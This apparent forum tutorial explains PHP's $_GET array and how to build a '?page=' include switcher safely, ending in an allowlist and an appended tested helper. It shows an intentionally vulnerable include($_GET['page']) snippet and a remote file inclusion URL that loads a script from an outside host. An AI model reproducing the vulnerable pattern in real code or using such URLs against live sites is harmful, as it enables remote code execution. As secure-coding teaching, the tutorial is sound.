Bryon
Introduction: Ever want to learn how to make one of those nifty "?page=pagename" scripts with PHP? This tutorial will explain how to do that, also briefly discussing the security side to it all.
Background:
Ever since PHP version 4.1.0, PHP has superglobal arrays that contain data from different places. They are:
- $_GET - Array of data from the HTTP GET method.
- $_POST - Array of data from the HTTP POST method.
- $_COOKIE - Array of data from cookies stored on the visitor's browser.
- $_REQUEST - A collection of all superglobal arrays available to the script running.
- $_SERVER - Array of data containing things like server configuration information, script locations, headers, etc.
- $_ENV - Array of environmental data.
- $_SESSION - Array of session data.
- $_FILES - Array of items uploaded to the current script.
I'm only going to talk about one of the superglobal arrays here, and that is $_GET.
$_GET contains an associative array of all data passed to the PHP script in the URL.
"In the URL" means things such as:
/index.php?word=value&word=value&etc=etc&etc
Or more realistically:
/login.php?username=NedreN&password=Imapassword
Each piece of data you wish to use in your PHP script is usually passed to the script in name=value pairs, for example: "username=NedreN".
So how do you think you get the data from the URL? The $_GET superglobal array is the answer.
Every name=value pair in the URL is automatically placed into the array. So say you went to:
/login.php?username=NedreN&password=Imapassword
In the PHP script on login.php, $_GET['username'] would contain the value "NedreN", and $_GET['password'] would contain the value "Imapassword".
Dynamic Includes:
You should know how to use data in the URL on a PHP script. How do you think you could make a "page changer/includer" using something like "?page=pagename" in the URL? I'll tell you how.
The quickest way to do this would be to use PHP's include() construct and just include $_GET['page'] wherever you wish the page to be:
PHP:
<?php
// UNSAFE, shown only as an example: the visitor decides what gets included.
$page = $_GET['page'];
include($page);
?>
That however is very very unsafe, and you should NEVER use it. I am just putting it on here as an example. What if you had that and someone did something such as:
http://site.com/index.php?page=http://nedren.com/badscript_Imgonna_h4xor_J00.php
Tisk tisk, not good. The page/site/script at http://nedren.com/badscript_Imgonna_h4xor_J00.php could be included into yours, which could contain malicious things. So how do you make a "dynamic page changer" safely? There are many options. I'll show two of them here:
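PHP:
<?php
// Place the value from ?page=value in the URL into the variable $page.
// A missing or non-string value (for example ?page[]=x) becomes an empty string.
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : '';
// Small check to see if the value contains anything bad.
// strpos() returns the position of the match, which is 0 for a match at the
// start of the string, so the result must be compared with "!== false".
// The first check in the original post had an empty search string; an empty
// needle matches every string on PHP 8, so that check is left out here.
if ((strpos($page, '/') !== false) OR (strpos($page, '.') !== false)) {
    echo 'HAHA! You have been caught.';
    die();
}
// Include the file "pages/$page.php".
include('pages/'. $page .'.php');
?>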
That right there attempts to make sure the value in $_GET['page'] will not be malicious and contain anything that should not be there. It's still not 100% perfect, so I shall also give you this:
PHP:
<?php
// Place the value from ?page=value in the URL into the variable $page.
// If there is no page set, use the default main page.
$page = (isset($_GET['page']) && $_GET['page'] !== '') ? $_GET['page'] : 'index';
// Create an array of the only pages allowed.
$pageArray = array(
    'index',
    'page1',
    'page2',
    'page3',
    'page4',
    'page5',
    'page6'
);
// Is $page in the array? The third argument makes the comparison strict.
$inArray = in_array($page, $pageArray, true);
// If so, include it, if not, emit error.
if ($inArray === true) {
    include('pages/'. $page .'.php');
} else {
    echo 'Umm tisk tisk. You shouldn\'t be messing with things.';
}
?>
Well there you are, you should be able to see how to edit that to your liking and place any pages you want into the array. I have it set up so that it will load pages from the directory /pages and auto-append the ".php" to the end of the page name. Remember that this will only include files in the array, and if the value of $_GET['page'] is not in the array, it will emit an error. Also, if nothing is set in $_GET['page'], it will include /pages/index.php. You can change that as well.
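The allowlist approach above, wrapped in a reusable function and run against a few constructed inputs; this is an added example, not code from the original post. It goes one step further than the post by also confirming with realpath() that the resolved file sits directly inside the pages directory. The helper name resolve_page(), the temporary directory and the sample inputs are assumptions made for the demonstration, and the type declarations need PHP 7.1 or later.

```php
<?php
// Added example (not from the original post). resolve_page() is a hypothetical helper.
// Returns the absolute path of the page to include, or null if the request is rejected.
function resolve_page($requested, array $allowed, string $pagesDir, string $default = 'index'): ?string
{
    // No ?page= in the URL (or an empty one): fall back to the default page.
    if ($requested === null || $requested === '') {
        $requested = $default;
    }
    // ?page[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested)) {
        return null;
    }
    // Strict comparison: the name must be exactly one of the allowed strings.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // Defence in depth: the file must exist and sit directly inside $pagesDir.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory holding two pages.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/index.php', 'index page');
file_put_contents($dir . '/page1.php', 'page one');

$allowed = array('index', 'page1', 'page2'); // page2 is listed but has no file
$inputs  = array(
    null,                                    // no ?page= at all
    'page1',
    'page2',
    'Page1',                                 // wrong case, not in the list
    'pages/page1',
    'http://nedren.com/badscript_Imgonna_h4xor_J00.php', // URL from the post
    array('page1'),                          // ?page[]=page1
);
foreach ($inputs as $in) {
    $path = resolve_page($in, $allowed, $dir);
    $shown = json_encode($in, JSON_UNESCAPED_SLASHES);
    echo str_pad($shown, 56), ' => ', $path === null ? 'rejected' : basename($path), "\n";
}
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);
```

Only the first two inputs resolve (to index.php and page1.php); every other value is rejected. In a real script, pass the value of $_GET['page'] (or null when it is not set) and call include only when the function returns a path.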